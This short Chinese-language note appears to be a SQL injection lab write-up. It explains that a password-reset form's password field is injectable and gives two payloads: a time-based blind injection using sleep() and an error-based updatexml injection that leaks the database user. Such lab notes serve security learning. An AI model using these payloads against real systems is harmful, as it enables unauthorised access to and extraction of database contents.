有两个注入点,user和新密码,通过查看源码得知,注入点只有password一项,并且是当存在username时,才会对password一项进行注入。
注入方式1:时间注入
利用单引号进行报错,后续可以利用时间
admin
2132321 'and if((database()='security'),sleep(0.3),sleep(0.1))#
后续与之前相同
注入方式2:updatexml函数注入
UpdateXML(xml_target,xpath_expr,new_xml)
xml_target:需要操作的xml片段
xpath_expr:需要更新的xml路径
new_xml:更新后的内容
123' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#